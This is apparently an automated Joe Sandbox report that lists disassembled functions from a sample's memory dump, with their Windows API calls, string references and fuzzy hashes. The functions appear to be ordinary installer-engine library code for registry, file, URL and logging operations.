Opcode ID: abdfe0471732026f677943eabf119b6cf7b17265b1bfd05c703691ed544182a9
Instruction ID: ea8364a5e81f25f1833b326a70074b9da6302d9ed8a9260858fa22d5ee973d8d
Opcode Fuzzy Hash: abdfe0471732026f677943eabf119b6cf7b17265b1bfd05c703691ed544182a9
Instruction Fuzzy Hash: 1031FCB1900746ABDE60EBB5C88EF9F73DCAF04740F48892DB66AE3051DB34E6049764

Function 00C9A691 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000001,00000000,00000000,00000000,?,?,00C9AB16,?,?,00000000,?,00000001,?,00000002,-00000001,00C98BDF), ref: 00C9A6A1
LeaveCriticalSection.KERNEL32(-00000001,00000002,00C98BDF,?,00C9AB16,?,?,00000000,?,00000001,?,00000002,-00000001,00C98BDF,00000001), ref: 00C9A73C

Strings

Failed to format value '%ls' of variable: %ls, xrefs: 00C9A706
Failed to get value as string for variable: %ls, xrefs: 00C9A72B
Failed to get variable: %ls, xrefs: 00C9A6D7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to format value '%ls' of variable: %ls$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-1273532094
Opcode ID: 4b3fb641295ccd59af719ed41bebe696c7a4ae35fca58009c1f00128927332ff
Instruction ID: d8cd78ad358aa7f77115fb8154c21a20b1a4794e2523bce18aa2a6adc11850d4
Opcode Fuzzy Hash: 4b3fb641295ccd59af719ed41bebe696c7a4ae35fca58009c1f00128927332ff
Instruction Fuzzy Hash: 0911E131240704FFCF226FD5DC8ACAF3BB9FB58310B24452AFA1556111D7729A90A7E2

Function 00CBE1E5 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00CBE1F3

Part of subcall function 00CBBB40: __FF_MSGBANNER.LIBCMT ref: 00CBBB59
Part of subcall function 00CBBB40: __NMSG_WRITE.LIBCMT ref: 00CBBB60
Part of subcall function 00CBBB40: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00CBC5F7,00000000,00000001,00000000,?,00CBBDA6,00000018,00CE34C0,0000000C,00CBBE36), ref: 00CBBB85

_free.LIBCMT ref: 00CBE206

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1dd12b1cc3b05f1fc3cfd7c8890e4e17e3f32e47a4d3622ba4206d5603918bf0
Instruction ID: 4fcba2a00b4a9ea31d47f67738d503ea739844026dfcfb6843d11420d42020ed
Opcode Fuzzy Hash: 1dd12b1cc3b05f1fc3cfd7c8890e4e17e3f32e47a4d3622ba4206d5603918bf0
Instruction Fuzzy Hash: 01112732844215EBCF223BB5EC06BDE379CAF40760F200525F8688A190DB71CE40E392

Function 00CB4D95 Relevance: 7.5, APIs: 5, Instructions: 37fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,00CB5335), ref: 00CB4DA7
CloseHandle.KERNEL32(?,00000000,00CB5335), ref: 00CB4DB4
CloseHandle.KERNEL32(?,00000000,00CB5335), ref: 00CB4DC2
CloseHandle.KERNEL32(?,00000000,00CB5335), ref: 00CB4DD0
UnmapViewOfFile.KERNEL32(?,00CB5335), ref: 00CB4DDF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 99fcb0a21338f609ce32f65820cfe2f830d92ddd7fd74344dc646a43c145c693
Instruction ID: 9f87ecf4dfba6a591c7f2b3d55dfb13de7f6c719a385dc695cd5daf77224d4f8
Opcode Fuzzy Hash: 99fcb0a21338f609ce32f65820cfe2f830d92ddd7fd74344dc646a43c145c693
Instruction Fuzzy Hash: 70F0BD716047019BDB34EFB5CC54F9BB3ECAF44B62F05881CE4A6D7552DB39E9008A60

Function 00CBC985 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00CBC991

Part of subcall function 00CB9EC2: __getptd_noexit.LIBCMT ref: 00CB9EC5
Part of subcall function 00CB9EC2: __amsg_exit.LIBCMT ref: 00CB9ED2

__getptd.LIBCMT ref: 00CBC9A8
__amsg_exit.LIBCMT ref: 00CBC9B6
__lock.LIBCMT ref: 00CBC9C6
__updatetlocinfoEx_nolock.LIBCMT ref: 00CBC9DA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: d8c0e7e90ab420122ea77e4460ef9ac74a1bac161593f5a6e6acf90ad533ff22
Instruction ID: d23ffb73c57e97bcebd4a1adf1d0b6014b3b525518642f7c58a0159a11124ced
Opcode Fuzzy Hash: d8c0e7e90ab420122ea77e4460ef9ac74a1bac161593f5a6e6acf90ad533ff22
Instruction Fuzzy Hash: 88F0E932E51750EFFB20FBB898837DE37A0AF00721F14414DF5A0AB2D2CB749940AA56

Function 00CC4FEC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

#115.MSI(?), ref: 00CC5019
#116.MSI(?,00000001,?), ref: 00CC5039

Strings

wiutil.cpp, xrefs: 00CC522D
2, xrefs: 00CC51E8

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: #115#116
String ID: 2$wiutil.cpp
API String ID: 618785432-2873045267
Opcode ID: a1d6cd358713f29b9a476fb79f65865df9f70ab3e703673cd4254f28494b6ca2
Instruction ID: 4b6c0d27e4e8759ef79399c78e03ab46b7d86c87ff931123896a1a3410f83258
Opcode Fuzzy Hash: a1d6cd358713f29b9a476fb79f65865df9f70ab3e703673cd4254f28494b6ca2
Instruction Fuzzy Hash: C761C671A00A058FCB28CF29CC85F7EB7B5FB94314B54867ED816DF196D631AA81CB90

Function 00CC39A7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 00CC39D0
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00CC3A08
lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,00000004,00000000,?,?,?,?,?,00020019,00000000,?), ref: 00CC3B12

Strings

regutil.cpp, xrefs: 00CC3A7B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: regutil.cpp
API String ID: 3790715954-955085611
Opcode ID: 9a00a16ad789d3c4d3001063eeb05c270c178ef597f42a50ddb94c3537dd9194
Instruction ID: f91b6de576e10ab9a38a6b2a6a586f156a4ea942f710bab8ed749afd790a6288
Opcode Fuzzy Hash: 9a00a16ad789d3c4d3001063eeb05c270c178ef597f42a50ddb94c3537dd9194
Instruction Fuzzy Hash: 9A518D7690015AAFCB219FD4D8C5FAEB7B9EB04310F24C56DE912AB251D3319F11ABA0

Function 00CC82F9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC8363
InternetCrackUrlW.WININET(?,00000000,90000000,?), ref: 00CC8412
GetLastError.KERNEL32 ref: 00CC841C

Strings

uriutil.cpp, xrefs: 00CC844C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CrackErrorInternetLast_memset
String ID: uriutil.cpp
API String ID: 2372571340-476456875
Opcode ID: e3368b5e0579c8055d97eebccb397e53757b159f30418e1320a36e9b60fa1934
Instruction ID: f9cdf31e9ba1c7972a6667f29898e7aab4eac8d2c6bd7d4986b27e81dd8625e2
Opcode Fuzzy Hash: e3368b5e0579c8055d97eebccb397e53757b159f30418e1320a36e9b60fa1934
Instruction Fuzzy Hash: E361E071901238DBCB22DF65CC88ADEBBB4BB08B00F4444EAE519A2211DB315FD9DF91

Function 00CC3E63 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000002,?,00000000,00000000,?,?,00CB143E), ref: 00CC3EBD
RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00CB143E,?), ref: 00CC3EDF
RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00CB143E,?,?,?), ref: 00CC3F2A

Strings

regutil.cpp, xrefs: 00CC3F51

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: 4d16646502d187cb7ca44a720aecac58c625ee3117a8bb3b848dda2ecdc2b55d
Instruction ID: 150563b2575d6d094b2a8c7f5a9043666c7f3a57fe16accaaa259ec0980944a2
Opcode Fuzzy Hash: 4d16646502d187cb7ca44a720aecac58c625ee3117a8bb3b848dda2ecdc2b55d
Instruction Fuzzy Hash: DF31B431A05269BFDB218AD0DC88FAFBB7CEF0A750F20886DF105D6051D2755F40A7A0

Function 00CC68F6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC6906
ShellExecuteExW.SHELL32(?), ref: 00CC6944
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00CC69D5

Strings

<, xrefs: 00CC6936

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseExecuteHandleShell_memset
String ID: <
API String ID: 1378689676-4251816714
Opcode ID: 75e6e3f86648946766eaa81c801ae3b86b088cee060bc889732ba9e3a25d9cb3
Instruction ID: 8e5d64c62cee44679b219a790df182a2f7704c0e6747671e49662c2e029b2c2f
Opcode Fuzzy Hash: 75e6e3f86648946766eaa81c801ae3b86b088cee060bc889732ba9e3a25d9cb3
Instruction Fuzzy Hash: 4D319175D1012AEBCB10DFA9CA44FADBAB4EB04354F14401EE861EB340D6398E44CBA9

Function 00CA75BD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA75CF

Strings

Failed to parse expression., xrefs: 00CA7611
Failed to expect end symbol., xrefs: 00CA7628
Failed to read next symbol., xrefs: 00CA75F7

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to expect end symbol.$Failed to parse expression.$Failed to read next symbol.
API String ID: 2102423945-1316734955
Opcode ID: dfc6b4f1a43aa983531d40e5370ac075361f518778f5e1166a178fef7498a2fa
Instruction ID: 9e7aabf2ab9fe497af1d286677593e0ebec8329647df2d940aca0d0a80c8008a
Opcode Fuzzy Hash: dfc6b4f1a43aa983531d40e5370ac075361f518778f5e1166a178fef7498a2fa
Instruction Fuzzy Hash: 8F119372D0561ABBDB10EE99DC82EDEB3ACAB05758F510226F911B7140E6305F01A7D0

Function 00CB131A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

RegCloseKey.ADVAPI32(00000000,00000000,00000000,?,?,00020019,00000000,?,?,?,?,00CB1476,?,?,?), ref: 00CB13CD

Strings

Failed to initialize package from related bundle id: %ls, xrefs: 00CB13AA
Failed to open uninstall key for potential related bundle: %ls, xrefs: 00CB1341
Failed to ensure there is space for related bundles., xrefs: 00CB1379

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: 10c7f83dafe07a3b6c70cabb5ae7bf5cacdbc28857e73dc543ed384daa35a151
Instruction ID: 8cab68e6746f174d83466e77ebabaa68a9fac99dc69dabe0816007f2e903f762
Opcode Fuzzy Hash: 10c7f83dafe07a3b6c70cabb5ae7bf5cacdbc28857e73dc543ed384daa35a151
Instruction Fuzzy Hash: B321CA76580209FBDB129B84CC86FEF76FAEB40701F344029F911A26A0EB34EE40E610

Function 00CBF76A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00CBF95C,?,?,?,00000000,0000FDE9), ref: 00CBF77C
WriteFile.KERNEL32(00000000,00000000,0000FDE9,00000000,?,?,00CBF95C,?,?,?,00000000,0000FDE9), ref: 00CBF7BE
GetLastError.KERNEL32(?,?,00CBF95C,?,?,?,00000000,0000FDE9), ref: 00CBF7C8

Strings

logutil.cpp, xrefs: 00CBF7F2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 086cdd5910cea67889a255576733139a6d2d03669801425100ac8c3e3b2860ec
Instruction ID: 0574794b1e8aba849609490e6dbad0256bd2adb887a61287d18bad06f7cb5371
Opcode Fuzzy Hash: 086cdd5910cea67889a255576733139a6d2d03669801425100ac8c3e3b2860ec
Instruction Fuzzy Hash: 8B117C7160021AAEEB109F9ACC89FAF7BACEB14794F20017DF915E6250DF70DE45C6A0

Function 00CC1B36 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,?,00000001,00000000,?,?,?,00CA6034,00000000,00000000,00000000), ref: 00CC1B68
GetLastError.KERNEL32(?,?,?,00CA6034,00000000,00000000,00000000,00000000,?,?,00CA20A2,?,?,80070656,00000001,?), ref: 00CC1B75
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,00CA6034,00000000,00000000,00000000,00000000,?,?,00CA20A2,?), ref: 00CC1BBC

Strings

strutil.cpp, xrefs: 00CC1B9A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 4a50e9457ef618b9cc10ea1dc8243d0ae99521baa396cbd877153b6b7537ce5e
Instruction ID: 27e3116b703e90297c12a874d54d65bd693d45638b84f5237927bfd301cd4676
Opcode Fuzzy Hash: 4a50e9457ef618b9cc10ea1dc8243d0ae99521baa396cbd877153b6b7537ce5e
Instruction Fuzzy Hash: 9E117CB2900208FBDB119F96CC1AEEEBA79EB81350F24016DF911E2151F2708E41DB50

Function 00CC648D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,?,00CB0D83,00000000,?,?,BundleCachePath,00000000), ref: 00CC64C3
GetLastError.KERNEL32(?,00CB0D83,00000000,?,?,BundleCachePath,00000000,?,BundleVersion,?,?,EngineVersion,?,00000000), ref: 00CC64D0

Strings

fileutil.cpp, xrefs: 00CC64A2, 00CC64F5

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: da8d754cd5ae65a943c25db8a7fea6828adc139ccaa5ffed99c00e16ff0cc17b
Instruction ID: b0e31cae9b980a8cdb9705a41d0c7dc4b809e7976b77f94961d5e6f589a20ae8
Opcode Fuzzy Hash: da8d754cd5ae65a943c25db8a7fea6828adc139ccaa5ffed99c00e16ff0cc17b
Instruction Fuzzy Hash: D201D172680325B6EB3067A5DD1EF6B765C9B40B60F20822DFA15FA1E1D6B9CD4092E0

Function 00CC67F3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(E900CCF2,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00C970D7,?,00C95F7A,00C970D7,00000080,E900CCF2,00000000), ref: 00CC680B
GetLastError.KERNEL32(?,00C95F7A,00C970D7,00000080,E900CCF2,00000000,?,?,00C970D7,00C913BB,?,?,?,?,?,DisplayName), ref: 00CC6818
CloseHandle.KERNEL32(00000000,00000000,00C970D7,00C95F7A,?,00C95F7A,00C970D7,00000080,E900CCF2,00000000,?,?,00C970D7,00C913BB), ref: 00CC686D

Strings

fileutil.cpp, xrefs: 00CC683D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: bcac31ff417bffed1ed354eaa4cc53a31916ef598165f6f18391f34d0fc4cd22
Instruction ID: fd7d830240ff7aedaace53366f03c2ba4f8bedf97e5fae9465045ad592df50c9
Opcode Fuzzy Hash: bcac31ff417bffed1ed354eaa4cc53a31916ef598165f6f18391f34d0fc4cd22
Instruction Fuzzy Hash: 5101F27220065567CB211EAADD0AF9A7B299B81B30F150239FF34EB1E0D731CD51A3A4

Function 00CC5518 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00CC555D
SysFreeString.OLEAUT32(00000000), ref: 00CC5592

Strings

xmlutil.cpp, xrefs: 00CC552E, 00CC5574
`<u, xrefs: 00CC5592

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: `<u$xmlutil.cpp
API String ID: 344208780-3482516102
Opcode ID: 98e7ded32f67e3b89a433544f62232b59ab4e5cd288bc0fa30937e0f24770db6
Instruction ID: 37de8fa107c06bd9d898b29ad1f096225381bef6e464de6e2b73bff17fa751b5
Opcode Fuzzy Hash: 98e7ded32f67e3b89a433544f62232b59ab4e5cd288bc0fa30937e0f24770db6
Instruction Fuzzy Hash: 2C01A27168070AA7DB101AAADC09F7A36AEDF54761F14003DF815DB350DB74DD819A90

Function 00CC560F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00CC5654
SysFreeString.OLEAUT32(00000000), ref: 00CC5689

Strings

xmlutil.cpp, xrefs: 00CC5625, 00CC566B
`<u, xrefs: 00CC5689

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: `<u$xmlutil.cpp
API String ID: 344208780-3482516102
Opcode ID: d0ab3d6bbfbddc7f0c4073ec0a7b4318c39cab6257b8f5a14e92a8c745fc419e
Instruction ID: d5dfaa71951f31ac1dd86cbf23b5a0f10219f69ee53223ffe1d6928416e632a2
Opcode Fuzzy Hash: d0ab3d6bbfbddc7f0c4073ec0a7b4318c39cab6257b8f5a14e92a8c745fc419e
Instruction Fuzzy Hash: CB01D67164070AABDB200AA6CC05FBA37ACDF50761F55003DF914DB351DBB4DC809BA0

Function 00CAEE11 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(?,00000001,?,00000001,00000000,?,?,?,?,?,?,?,00CAEFAB), ref: 00CAEE36
